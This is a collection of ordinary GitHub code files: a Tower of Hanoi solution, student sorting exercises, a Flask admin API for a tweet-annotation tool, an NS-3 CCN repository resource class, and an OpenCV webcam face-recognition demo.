+{"seq_id":"72489201794","text":"def hanoi(n, start, temp, end):\n    global answer\n    \n    # If there is only one disk, move it directly\n    if n == 1:\n        answer.append([start, end])\n    # Otherwise, move it in three steps\n    else:\n        # Move the remaining disks to the temporary peg\n        hanoi(n - 1, start, end, temp)\n        # Move the largest disk to the destination\n        hanoi(1, start, temp, end)\n        # Move the disks on the temporary peg to the destination \n        hanoi(n - 1, temp, start, end)\n    \n\ndef solution(n):\n    global answer\n    answer = []\n    \n    hanoi(n, 1, 2, 3)\n    \n    return answer\n","repo_name":"Lairin-pdj/coding_test_practice_programmers","sub_path":"하노이의 탑.py","file_name":"하노이의 탑.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31834473096","text":"from random import randint\nimport random\nimport math\n#print(random.sample(range(1, 18), 4) ) --→ [1, 7, 3, 11]\n\n\n# 1 a list of integers from 0 to 999999\nspisok1 = [random.randint(0, 999999) for i in range(999999)]\n\n# 2 a list of 99999 random real numbers in the range [-1, 1];\nspisok2 = [random.uniform(-1, 1) for i in range(999999)]\n\n# 3 42000 distinct points of the complex plane lying within a circle of radius radius=20/2=10\nparam = 2 * math.pi / 42000\nplane_of_points = []\nfor i in range(42000):\n    r1 = 10 * math.cos(i * param)\n    r2 = 10 * math.sin(i * param)\n    plane_of_points.append((r1, 
r2))\n\n\n# 4: a book\nwith open('elegance.txt', 'r', encoding = 'utf-8') as doc:\n    book = doc.read().lower()\nlist_of_text = book.split()\n\n# 1: shaker sort (implemented here as an insertion sort)\ndef shaker_sort(arr):\n\n    for i in range(1, len(arr)):\n        shake = arr[i]\n        j = i - 1\n        while (j >= 0) and (arr[j] > shake):\n            arr[j + 1] = arr[j]\n            j = j - 1\n        arr[j + 1] = shake\n    return arr\n#print(shaker_sort(spisok1))\n\n# 7: gnome sort\ndef gnom(arr):\n    i, size = 1, len(arr)\n    while i < size:\n        if arr[i - 1] <= arr[i]:\n            i += 1\n        else:\n            arr[i], arr[i-1] = arr[i-1], arr[i]\n            if i > 1:\n                i -= 1\n    return arr\n#print(gnom(spisok2))\n\n# 3: comb sort\ndef rascheska(arr):\n    first = len(arr) - 1\n    swapped = True\n    while first > 1 or swapped:\n        swapped = False\n        for i in range(0, len(arr) - first):\n            if (arr[i] > arr[i + first]):\n                arr[i], arr[i + first] = arr[i + first], arr[i]\n                swapped = True\n        # shrink the gap on every pass; keep making gap-1 passes until no swaps occur\n        if first > 1:\n            first = int(first / 1.25)\n    return arr\n#print(rascheska(plane_of_points))\n\n\n# 11: merge sort\ndef merge_sort (arr):\n    if len(arr) < 2:\n        return arr\n    result = []\n    middle = int(len(arr) / 2)\n    one = merge_sort(arr[:middle])\n    two = merge_sort(arr[middle:])\n    i = 0\n    j = 0\n    while i < len(one) and j < len(two):\n        if one[i] > two[j]:\n            result.append(two[j])\n            j += 1\n        else:\n            result.append(one[i])\n            i += 1\n    result += one[i:]\n    result += two[j:]\n    return result\n#print(merge_sort(list_of_text))\n\n\n\n\n\n","repo_name":"kit8nino/2023-python","sub_path":"ИС34/Монцева Екатерина/[2].py","file_name":"[2].py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"35516189951","text":"__author__ = 'Daksh Patel'\n\nimport os\n\nfrom flask import *\nfrom werkzeug.utils import secure_filename\n\nfrom project import auth\nfrom project.model.tweetModel import *\nfrom utils.utils import *\n\n\n@app.route('/admin/fetch_annotation_overview', methods=['GET'])\n@auth.login_required\ndef fetch_annotation_overview():\n    user = g.user\n    if \"admin\" in user.roles:\n        admin = Admin()\n        language = request.args.get('language')\n        response = admin.fetch_annotation_by_users(lang=language)\n        # print(response)\n        code = 200\n        status = True\n        msg = f'{len(response)} users'\n        result = {\n            'annotation_info': response\n        }\n        resp = createResponse(\n            status_value=status,\n            code=code,\n            message=msg,\n            result=result\n        )\n        return resp\n    else:\n        resp = unauthorized_access()\n        return resp\n\n\n@app.route('/admin/fetch_reported_tweets', methods=['GET'])\n@auth.login_required\ndef fetch_reported_tweets_admin():\n    user = g.user\n    if \"admin\" in user.roles:\n        user_id = user.id\n        language = request.args.get('language')\n        reported_tweets = ReportedTweets.getAllReportedTweets(lang=language)\n        status = True\n        code = 200\n        msg = f'{len(reported_tweets)} tweets found!'\n        if len(reported_tweets) == 0:\n            msg = 'User has not reported any tweets yet!'\n        msg = msg\n        result = {\n            'reported_tweets': reported_tweets\n        }\n        resp = createResponse(\n            status_value=status,\n            code=code,\n            message=msg,\n            result=result\n        )\n        return resp\n    else:\n        resp = unauthorized_access()\n        return resp\n\n\n@app.route('/admin/fetch_all_annotated_tweets', methods=['GET'])\n@auth.login_required\ndef fetch_all_annotated_tweets():\n    user = g.user\n    if 'admin' in user.roles:\n        language = request.args.get('language')\n        tweets = Tweets.objects(Q(total_annotation__gt=0) & Q(lang=language))\n        tweets = json.loads(tweets.to_json())\n        # print(tweets)\n        # print(language, len(tweets))\n        code = 200\n        status = True\n        msg = f'{len(tweets)} tweets found!'\n        if 
len(tweets) == 0:\n msg = 'Annotations not started yet!'\n msg = msg\n result = {\n 'tweets': tweets\n }\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/fetch_statistics', methods=['GET'])\n@auth.login_required\ndef fetch_statistics():\n user = g.user\n if 'admin' in user.roles:\n language = request.args.get('language')\n statistics = Admin.fetch_statistics(lang=language)\n code = 200\n status = True\n msg = f'Data received!'\n # if len(tweets) == 0:\n # msg = 'Annotations not started yet!'\n msg = msg\n result = {\n 'statistics': statistics\n }\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/fetch_users', methods=['GET'])\n@auth.login_required\ndef fetch_users():\n user = g.user\n print(user)\n if \"admin\" in user.roles:\n users = Admin.fetch_all_user()\n code = 200\n status = True\n msg = f'{len(users)} users found!'\n # if len(tweets) == 0:\n # msg = 'Annotations not started yet!'\n msg = msg\n result = {\n 'users': users\n }\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/add_more_tweets', methods=['POST'])\n@auth.login_required\ndef add_more_tweets():\n user = g.user\n if 'admin' in user.roles:\n admin = Admin()\n username = request.form.get('username')\n count = int(request.form.get('count'))\n language = request.form.get('language')\n # if not language:\n # language='en'\n # print(count, type(count))\n statuses = []\n msgs = []\n result = {}\n # for username in usernames:\n # # result[]\n status, msg = admin.add_more_tweets(username, count, lang=language)\n #\n if status:\n code = 200\n result = {}\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n code = 400\n result = {}\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/remove_tweets', methods=['POST'])\n@auth.login_required\ndef remove_tweets():\n user = g.user\n if 'admin' in user.roles:\n username = request.form.get('username')\n count = int(request.form.get('count'))\n language = request.form.get('language')\n admin = Admin()\n status, msg = admin.remove_tweets(\n username=username,\n count=count,\n lang=language\n )\n if status:\n code = 200\n result = {}\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n code = 400\n result = {}\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/add_user', methods=['POST'])\n@auth.login_required\ndef add_user():\n user = g.user\n if 'admin' in user.roles:\n name = request.form.get('name')\n username = request.form.get('username')\n password = request.form.get('password')\n langs = json.loads(request.form.get('languages'))\n query_set = User.objects(username=username)\n resp = None\n print(type(langs))\n print(request.data)\n print(request.get_data())\n if query_set.count() != 0:\n status = False\n code = 400\n msg = 'Username already exists!'\n result = {}\n resp = 
createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n else:\n admin = Admin()\n status = admin.create_user(\n name=name,\n username=username,\n password=password,\n lang=langs\n )\n if status:\n code = 200\n result = {}\n msg = 'User added successfully!'\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n else:\n code = 400\n result = {}\n msg = 'Something went wrong'\n resp = createResponse(\n status_value=status,\n code=code,\n message=msg,\n result=result\n )\n return resp\n else:\n resp = unauthorized_access()\n return resp\n\n\n@app.route('/admin/upload_more_tweets', methods=['POST'])\n@auth.login_required\ndef upload_more_tweets():\n user = g.user\n if \"admin\" in user.roles:\n file_ = request.files['fileName']\n filename = secure_filename(file_.filename)\n data = file_.read().decode('utf-8')\n tmp_file_ptr = open(\"./tmp/{}\".format(filename), 'w')\n tmp_file_ptr.write(data)\n tmp_file_name = tmp_file_ptr.name\n tmp_file_ptr.close()\n stat, write_file_name = csvToJson(tmp_file_name)\n if stat == True:\n # print(\"erererer\")\n # print(write_file_name)\n data = json.load(open(write_file_name))\n admin = Admin()\n # print(datetime.datetime.now())\n resp = admin.upload_more_tweets(data)\n # print(datetime.datetime.now())\n if resp!=0:\n code = 200\n result = {}\n msg = f'{resp} rows added successfully!'\n resp = createResponse(\n status_value=True,\n code=code,\n message=msg,\n result=result\n )\n # print(resp)\n else:\n os.remove(write_file_name)\n code = 201\n result = {}\n msg = \"No new tweets found in the file: {}\".format(filename)\n resp = createResponse(\n status_value=True,\n code=code,\n message=msg,\n result=result\n )\n # print(resp)\n\n return resp\n else:\n code = 500\n result = {}\n msg = \"Invalid file type or format\"\n resp = createResponse(\n status_value=False,\n code=code,\n message=msg,\n result=result\n )\n return resp\n\n else:\n resp = unauthorized_access()\n return resp\n","repo_name":"daksh2298/annotation-platform","sub_path":"project/controller/adminController.py","file_name":"adminController.py","file_ext":"py","file_size_in_byte":10112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11931563840","text":"from nepi.execution.attribute import Attribute, Flags, Types\nfrom nepi.execution.resource import clsinit_copy, ResourceState \nfrom nepi.resources.linux.ns3.ccn.ns3ccndceapplication import LinuxNS3CCNDceApplication\n\n@clsinit_copy\nclass LinuxNS3DceCCNR(LinuxNS3CCNDceApplication):\n _rtype = \"linux::ns3::dce::CCNR\"\n\n @classmethod\n def _register_attributes(cls):\n max_fanout = Attribute(\"maxFanout\",\n \"Sets the CCNR_BTREE_MAX_FANOUT environmental variable. \",\n flags = Flags.Design)\n\n max_leaf_entries = Attribute(\"maxLeafEntries\",\n \"Sets the CCNR_BTREE_MAX_LEAF_ENTRIES environmental variable. \",\n flags = Flags.Design)\n\n max_node_bytes = Attribute(\"maxNodeBytes\",\n \"Sets the CCNR_BTREE_MAX_NODE_BYTES environmental variable. \",\n flags = Flags.Design)\n\n max_node_pool = Attribute(\"maxNodePool\",\n \"Sets the CCNR_BTREE_MAX_NODE_POOL environmental variable. \",\n flags = Flags.Design)\n\n content_cache = Attribute(\"contentCache\",\n \"Sets the CCNR_CONTENT_CACHE environmental variable. \",\n flags = Flags.Design)\n\n debug = Attribute(\"debug\",\n \"Sets the CCNR_DEBUG environmental variable. \"\n \"Logging level for ccnr. 
Defaults to WARNING.\",\n type = Types.Enumerate,\n allowed = [\n \"NONE\",\n \"SEVERE\",\n \"ERROR\",\n \"WARNING\",\n \"INFO\",\n \"FINE, FINER, FINEST\"],\n flags = Flags.Design)\n\n directory = Attribute(\"directory\",\n \"Sets the CCNR_DIRECTORY environmental variable. \",\n flags = Flags.Design)\n\n global_prefix = Attribute(\"globalPrefix\",\n \"Sets the CCNR_GLOBAL_PREFIX environmental variable. \",\n flags = Flags.Design)\n\n listen_on = Attribute(\"listenOn\",\n \"Sets the CCNR_LISTEN_ON environmental variable. \",\n flags = Flags.Design)\n\n min_send_bufsize = Attribute(\"minSendBufsize\",\n \"Sets the CCNR_MIN_SEND_BUFSIZE environmental variable. \",\n flags = Flags.Design)\n\n proto = Attribute(\"proto\",\n \"Sets the CCNR_PROTO environmental variable. \",\n flags = Flags.Design)\n\n status_port = Attribute(\"statusPort\",\n \"Sets the CCNR_STATUS_PORT environmental variable. \",\n flags = Flags.Design)\n\n start_write_scope_limit = Attribute(\"startWriteScopeLimit\",\n \"Sets the CCNR_START_WRITE_SCOPE_LIMIT environmental variable. \",\n flags = Flags.Design)\n\n ccns_debug = Attribute(\"ccnsDebug\",\n \"Sets the CCNS_DEBUG environmental variable. \",\n flags = Flags.Design)\n\n ccns_enable = Attribute(\"ccnsEnable\",\n \"Sets the CCNS_ENABLE environmental variable. \",\n flags = Flags.Design)\n\n ccns_faux_error = Attribute(\"ccnsFauxError\",\n \"Sets the CCNS_FAUX_ERROR environmental variable. \",\n flags = Flags.Design)\n\n ccns_heartbeat_micros = Attribute(\"ccnsHeartBeatMicros\",\n \"Sets the CCNS_HEART_BEAT_MICROS environmental variable. \",\n flags = Flags.Design)\n\n ccns_max_compares_busy = Attribute(\"ccnsMaxComparesBusy\",\n \"Sets the CCNS_MAX_COMPARES_BUSY environmental variable. \",\n flags = Flags.Design)\n\n ccns_max_fetch_busy = Attribute(\"ccnsMaxFetchBusy\",\n \"Sets the CCNS_MAX_FETCH_BUSY environmental variable. \",\n flags = Flags.Design)\n\n ccns_node_fetch_lifetime = Attribute(\"ccnsNodeFetchLifetime\",\n \"Sets the CCNS_NODE_FETCH_LIFETIME environmental variable. \",\n flags = Flags.Design)\n\n ccns_note_err = Attribute(\"ccnsNoteErr\",\n \"Sets the CCNS_NOTE_ERR environmental variable. \",\n flags = Flags.Design)\n\n ccns_repo_store = Attribute(\"ccnsRepoStore\",\n \"Sets the CCNS_REPO_STORE environmental variable. \",\n flags = Flags.Design)\n\n ccns_root_advise_fresh = Attribute(\"ccnsRootAdviseFresh\",\n \"Sets the CCNS_ROOT_ADVISE_FRESH environmental variable. \",\n flags = Flags.Design)\n\n ccns_root_advise_lifetime = Attribute(\"ccnsRootAdviseLifetime\",\n \"Sets the CCNS_ROOT_ADVISE_LIFETIME environmental variable. \",\n flags = Flags.Design)\n\n ccns_stable_enabled = Attribute(\"ccnsStableEnabled\",\n \"Sets the CCNS_STABLE_ENABLED environmental variable. \",\n flags = Flags.Design)\n\n ccns_sync_scope = Attribute(\"ccnsSyncScope\",\n \"Sets the CCNS_SYNC_SCOPE environmental variable. 
\",\n flags = Flags.Design)\n\n repo_file = Attribute(\"repoFile1\",\n \"The Repository uses $CCNR_DIRECTORY/repoFile1 for \"\n \"persistent storage of CCN Content Objects\",\n flags = Flags.Design)\n\n cls._register_attribute(max_fanout)\n cls._register_attribute(max_leaf_entries)\n cls._register_attribute(max_node_bytes)\n cls._register_attribute(max_node_pool)\n cls._register_attribute(content_cache)\n cls._register_attribute(debug)\n cls._register_attribute(directory)\n cls._register_attribute(global_prefix)\n cls._register_attribute(listen_on)\n cls._register_attribute(min_send_bufsize)\n cls._register_attribute(proto)\n cls._register_attribute(status_port)\n cls._register_attribute(start_write_scope_limit)\n cls._register_attribute(ccns_debug)\n cls._register_attribute(ccns_enable)\n cls._register_attribute(ccns_faux_error)\n cls._register_attribute(ccns_heartbeat_micros)\n cls._register_attribute(ccns_max_compares_busy)\n cls._register_attribute(ccns_max_fetch_busy)\n cls._register_attribute(ccns_node_fetch_lifetime)\n cls._register_attribute(ccns_note_err)\n cls._register_attribute(ccns_repo_store)\n cls._register_attribute(ccns_root_advise_fresh)\n cls._register_attribute(ccns_root_advise_lifetime)\n cls._register_attribute(ccns_stable_enabled)\n cls._register_attribute(ccns_sync_scope)\n cls._register_attribute(repo_file)\n\n def _instantiate_object(self):\n if not self.get(\"binary\"):\n self.set(\"binary\", \"ccnr\")\n\n if not self.get(\"environment\"):\n self.set(\"environment\", self._environment)\n \n repoFile1 = self.get(\"repoFile1\")\n if repoFile1:\n env = \"CCNR_DIRECTORY=/REPO/\" \n environment = self.get(\"environment\")\n if environment:\n env += \";\" + environment\n self.set(\"environment\", env)\n self.set(\"files\", \"%s=/REPO/repoFile1\" % repoFile1) \n\n super(LinuxNS3DceCCNR, self)._instantiate_object()\n\n @property\n def _environment(self):\n envs = dict({\n \"maxFanout\": \"CCNR_BTREE_MAX_FANOUT\",\n \"maxLeafEntries\": \"CCNR_BTREE_MAX_LEAF_ENTRIES\",\n \"maxNodeBytes\": \"CCNR_BTREE_MAX_NODE_BYTES\",\n \"maxNodePool\": \"CCNR_BTREE_MAX_NODE_POOL\",\n \"contentCache\": \"CCNR_CONTENT_CACHE\",\n \"debug\": \"CCNR_DEBUG\",\n \"directory\": \"CCNR_DIRECTORY\",\n \"globalPrefix\": \"CCNR_GLOBAL_PREFIX\",\n \"listenOn\": \"CCNR_LISTEN_ON\",\n \"minSendBufsize\": \"CCNR_MIN_SEND_BUFSIZE\",\n \"proto\": \"CCNR_PROTO\",\n \"statusPort\": \"CCNR_STATUS_PORT\",\n \"startWriteScopeLimit\": \"CCNR_START_WRITE_SCOPE_LIMIT\",\n \"ccnsDebug\": \"CCNS_DEBUG\",\n \"ccnsEnable\": \"CCNS_ENABLE\",\n \"ccnsFauxError\": \"CCNS_FAUX_ERROR\",\n \"ccnsHeartBeatMicros\": \"CCNS_HEART_BEAT_MICROS\",\n \"ccnsMaxComparesBusy\": \"CCNS_MAX_COMPARES_BUSY\",\n \"ccnsMaxFetchBusy\": \"CCNS_MAX_FETCH_BUSY\",\n \"ccnsNodeFetchLifetime\": \"CCNS_NODE_FETCH_LIFETIME\",\n \"ccnsNoteErr\": \"CCNS_NOTE_ERR\",\n \"ccnsRepoStore\": \"CCNS_REPO_STORE\",\n \"ccnsRootAdviseFresh\": \"CCNS_ROOT_ADVISE_FRESH\",\n \"ccnsRootAdviseLifetime\": \"CCNS_ROOT_ADVISE_LIFETIME\",\n \"ccnsStableEnabled\": \"CCNS_STABLE_ENABLED\",\n \"ccnsSyncScope\": \"CCNS_SYNC_SCOPE\",\n })\n\n env = \";\".join(map(lambda k: \"%s=%s\" % (envs.get(k), str(self.get(k))), \n [k for k in envs.keys() if self.get(k)]))\n\n return env\n\n\n","repo_name":"phiros/nepi","sub_path":"src/nepi/resources/linux/ns3/ccn/ns3ccnrdceapplication.py","file_name":"ns3ccnrdceapplication.py","file_ext":"py","file_size_in_byte":8447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"21912738967","text":"#### https://github.com/ageitgey/face_recognition/tree/master\n#### https://pypi.org/project/face-recognition/\n#### https://viso.ai/computer-vision/deepface/\n#### https://pyimagesearch.com/2021/04/19/face-detection-with-dlib-hog-and-cnn/\nimport face_recognition\nimport cv2\nimport numpy as np\nimport os\n\n# This is a demo of running face recognition on live video from your webcam. It's a little more complicated than the\n# other example, but it includes some basic performance tweaks to make things run a lot faster:\n# 1. Process each video frame at 1/4 resolution (though still display it at full resolution)\n# 2. Only detect faces in every other frame of video.\n\n# PLEASE NOTE: This example requires OpenCV (the `cv2` library) to be installed only to read from your webcam.\n# OpenCV is *not* required to use the face_recognition library. It's only required if you want to run this\n# specific demo. If you have trouble installing it, try any of the other demos that don't require it instead.\n\n###Load sample images and train(recognize) them one by one\n## Load a sample picture and learn how to recognize it.\n# jitu_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702028_Jitu.png\")\n# jitu_face_encoding = face_recognition.face_encodings(jitu_image)[0]\n\n# ## Load a second sample picture and learn how to recognize it.\n# najmul_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702069_Najmul.png\")\n# najmul_face_encoding = face_recognition.face_encodings(najmul_image)[0]\n\n# ## Load a second sample picture and learn how to recognize it.\n# akash_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702013_Akash.jpg\")\n# akash_face_encoding = face_recognition.face_encodings(akash_image)[0]\n\n# ## Load a second sample picture and learn how to recognize it.\n# shaikat_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702030_Shaikat.jpg\")\n# shaikat_face_encoding = face_recognition.face_encodings(shaikat_image)[0]\n\n\n# ## Create arrays of known face encodings and their names\n# known_face_encodings = [\n# najmul_face_encoding,\n# jitu_face_encoding,\n# akash_face_encoding,\n# shaikat_face_encoding\n# ]\n# known_face_names = [\n# \"Najmul\",\n# \"Jitu\",\n# \"Akash\",\n# \"Shaikat\"\n# ]\n\n###Load sample images and train(recognize) them by a folder\n## Load a sample picture and learn how to recognize it.\n\ndef load_images_from_folder_and_recognize(folder):\n \"this function loads images from a folder and train with their name\"\n known_face_names=[]\n known_face_encodings=[]\n images = []\n for filename in os.listdir(folder):\n img = cv2.imread(os.path.join(folder,filename))\n img_path = os.path.join(folder,filename)\n if img_path is not None:\n #filename with extension\n #print(filename)\n #filename without extension\n indexoflastdot = filename.rfind(\".\")\n onlyfilename=filename[:indexoflastdot]\n\n # Load a sample picture and learn how to recognize it.\n image = face_recognition.load_image_file(img_path)\n image_encoding = face_recognition.face_encodings(image)[0]\n known_face_names.append(onlyfilename)\n known_face_encodings.append(image_encoding)\n print(filename+\" recognizing complete\")\n images.append(img)\n return known_face_names,known_face_encodings\n\nknown_face_names,known_face_encodings=load_images_from_folder_and_recognize('./DataScience/OpenCV/CSE-15-Final/')\n\n## Initialize some variables\nface_locations = []\nface_encodings = 
[]\nface_names = []\nprocess_this_frame = True\n\n## Get a reference to webcam #0 or ipcam (the default one)\nvideo_capture = cv2.VideoCapture(0)\n#video_capture = cv2.VideoCapture('rtsp://foscamr2:foscamr2@192.168.1.2:88/videoMain')\n#video_capture = cv2.VideoCapture('rtsp://visitor1:visitor1@192.168.1.2:88/videoMain')\n\nwhile True:\n # Grab a single frame of video\n ret, frame = video_capture.read()\n\n # Only process every other frame of video to save time\n if process_this_frame:\n # Resize frame of video to 1/4 size for faster face recognition processing\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n #rgb_small_frame = small_frame[:, :, ::-1] #not works\n #rgb_small_frame = cv2.cvtColor(small_frame, cv2.COLOR_BGR2RGB)\n rgb_small_frame = np.ascontiguousarray(small_frame[:, :, ::-1])\n \n # Find all the faces and face encodings in the current frame of video\n face_locations = face_recognition.face_locations(rgb_small_frame)\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\n face_names = []\n for face_encoding in face_encodings:\n # See if the face is a match for the known face(s)\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n name = \"Unknown\"\n\n # # If a match was found in known_face_encodings, just use the first one.\n # if True in matches:\n # first_match_index = matches.index(True)\n # name = known_face_names[first_match_index]\n\n # Or instead, use the known face with the smallest distance to the new face\n face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n\n face_names.append(name)\n\n process_this_frame = not process_this_frame\n\n\n # Display the results\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n # Scale back up face locations since the frame we detected in was scaled to 1/4 size\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (255, 115, 115), 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom - 25), (right, bottom), (255, 0, 0), cv2.FILLED)\n #font = cv2.FONT_HERSHEY_DUPLEX\n #font = cv2.FONT_HERSHEY_TRIPLEX\n font = cv2.FONT_HERSHEY_COMPLEX_SMALL\n cv2.putText(frame, name, (left + 6, bottom - 6), font, 0.53, (255, 255, 255), 1)\n\n # Display the resulting image\n cv2.imshow('Video', frame)\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release handle to the webcam\nvideo_capture.release()\ncv2.destroyAllWindows()\n\n#########Using Multi-processing############\n# import face_recognition\n# import cv2\n# from multiprocessing import Process, Manager, cpu_count, set_start_method\n# import time\n# import numpy as np\n# import threading\n# import platform\n\n\n# # This is a little bit complicated (but fast) example of running face recognition on live video from your webcam.\n# # This example is using multiprocess.\n\n# # PLEASE NOTE: This example requires OpenCV (the `cv2` library) to be installed only to read from your webcam.\n# # OpenCV is *not* required to use the face_recognition library. It's only required if you want to run this\n# # specific demo. 
If you have trouble installing it, try any of the other demos that don't require it instead.\n\n\n# # Get next worker's id\n# def next_id(current_id, worker_num):\n# if current_id == worker_num:\n# return 1\n# else:\n# return current_id + 1\n\n\n# # Get previous worker's id\n# def prev_id(current_id, worker_num):\n# if current_id == 1:\n# return worker_num\n# else:\n# return current_id - 1\n\n\n# # A subprocess use to capture frames.\n# def capture(read_frame_list, Global, worker_num):\n# # Get a reference to webcam #0 (the default one)\n# #video_capture = cv2.VideoCapture(0)\n# video_capture = cv2.VideoCapture('rtsp://foscamr2:foscamr2@192.168.1.2:88/videoMain')\n# # video_capture.set(3, 640) # Width of the frames in the video stream.\n# # video_capture.set(4, 480) # Height of the frames in the video stream.\n# # video_capture.set(5, 30) # Frame rate.\n# print(\"Width: %d, Height: %d, FPS: %d\" % (video_capture.get(3), video_capture.get(4), video_capture.get(5)))\n\n# while not Global.is_exit:\n# # If it's time to read a frame\n# if Global.buff_num != next_id(Global.read_num, worker_num):\n# # Grab a single frame of video\n# ret, frame = video_capture.read()\n# read_frame_list[Global.buff_num] = frame\n# Global.buff_num = next_id(Global.buff_num, worker_num)\n# else:\n# time.sleep(0.01)\n\n# # Release webcam\n# video_capture.release()\n\n\n# # Many subprocess use to process frames.\n# def process(worker_id, read_frame_list, write_frame_list, Global, worker_num):\n# known_face_encodings = Global.known_face_encodings\n# known_face_names = Global.known_face_names\n# while not Global.is_exit:\n\n# # Wait to read\n# while Global.read_num != worker_id or Global.read_num != prev_id(Global.buff_num, worker_num):\n# # If the user has requested to end the app, then stop waiting for webcam frames\n# if Global.is_exit:\n# break\n\n# time.sleep(0.01)\n\n# # Delay to make the video look smoother\n# time.sleep(Global.frame_delay)\n\n# # Read a single frame from frame list\n# frame_process = read_frame_list[worker_id]\n\n# # Expect next worker to read frame\n# Global.read_num = next_id(Global.read_num, worker_num)\n\n# # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n# #rgb_frame = frame_process[:, :, ::-1] not works\n# rgb_frame = np.ascontiguousarray(frame_process[:, :, ::-1])\n\n# # Find all the faces and face encodings in the frame of video, cost most time\n# face_locations = face_recognition.face_locations(rgb_frame)\n# face_encodings = face_recognition.face_encodings(rgb_frame, face_locations)\n\n# # Loop through each face in this frame of video\n# for (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings):\n# # See if the face is a match for the known face(s)\n# matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n\n# name = \"Unknown\"\n\n# # If a match was found in known_face_encodings, just use the first one.\n# if True in matches:\n# first_match_index = matches.index(True)\n# name = known_face_names[first_match_index]\n\n# # Draw a box around the face\n# cv2.rectangle(frame_process, (left, top), (right, bottom), (0, 0, 255), 2)\n\n# # Draw a label with a name below the face\n# cv2.rectangle(frame_process, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)\n# font = cv2.FONT_HERSHEY_DUPLEX\n# cv2.putText(frame_process, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n\n# # Wait to write\n# while Global.write_num != worker_id:\n# time.sleep(0.01)\n\n# # Send frame to 
global\n# write_frame_list[worker_id] = frame_process\n\n# # Expect next worker to write frame\n# Global.write_num = next_id(Global.write_num, worker_num)\n\n\n# if __name__ == '__main__':\n\n# # Fix Bug on MacOS\n# if platform.system() == 'Darwin':\n# set_start_method('forkserver')\n\n# # Global variables\n# Global = Manager().Namespace()\n# Global.buff_num = 1\n# Global.read_num = 1\n# Global.write_num = 1\n# Global.frame_delay = 0\n# Global.is_exit = False\n# read_frame_list = Manager().dict()\n# write_frame_list = Manager().dict()\n\n# # Number of workers (subprocess use to process frames)\n# if cpu_count() > 2:\n# worker_num = cpu_count() - 1 # 1 for capturing frames\n# else:\n# worker_num = 2\n\n# # Subprocess list\n# p = []\n\n# # Create a thread to capture frames (if uses subprocess, it will crash on Mac)\n# p.append(threading.Thread(target=capture, args=(read_frame_list, Global, worker_num,)))\n# p[0].start()\n\n# # Load a sample picture and learn how to recognize it.\n# jitu_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702028_Jitu.png\")\n# jitu_face_encoding = face_recognition.face_encodings(jitu_image)[0]\n\n# # Load a second sample picture and learn how to recognize it.\n# najmul_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702069_Najmul.png\")\n# najmul_face_encoding = face_recognition.face_encodings(najmul_image)[0]\n\n# # Load a second sample picture and learn how to recognize it.\n# akash_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702013_Akash.jpg\")\n# akash_face_encoding = face_recognition.face_encodings(akash_image)[0]\n\n# # Load a second sample picture and learn how to recognize it.\n# shaikat_image = face_recognition.load_image_file(\"./DataScience/OpenCV/CSE-15-Final/1702030_Shaikat.jpg\")\n# shaikat_face_encoding = face_recognition.face_encodings(shaikat_image)[0]\n\n\n# # Create arrays of known face encodings and their names\n# Global.known_face_encodings = [\n# najmul_face_encoding,\n# jitu_face_encoding,\n# akash_face_encoding,\n# shaikat_face_encoding\n# ]\n# Global.known_face_names = [\n# \"Najmul\",\n# \"Jitu\",\n# \"Akash\",\n# \"Shaikat\"\n# ]\n\n# # Create workers\n# for worker_id in range(1, worker_num + 1):\n# p.append(Process(target=process, args=(worker_id, read_frame_list, 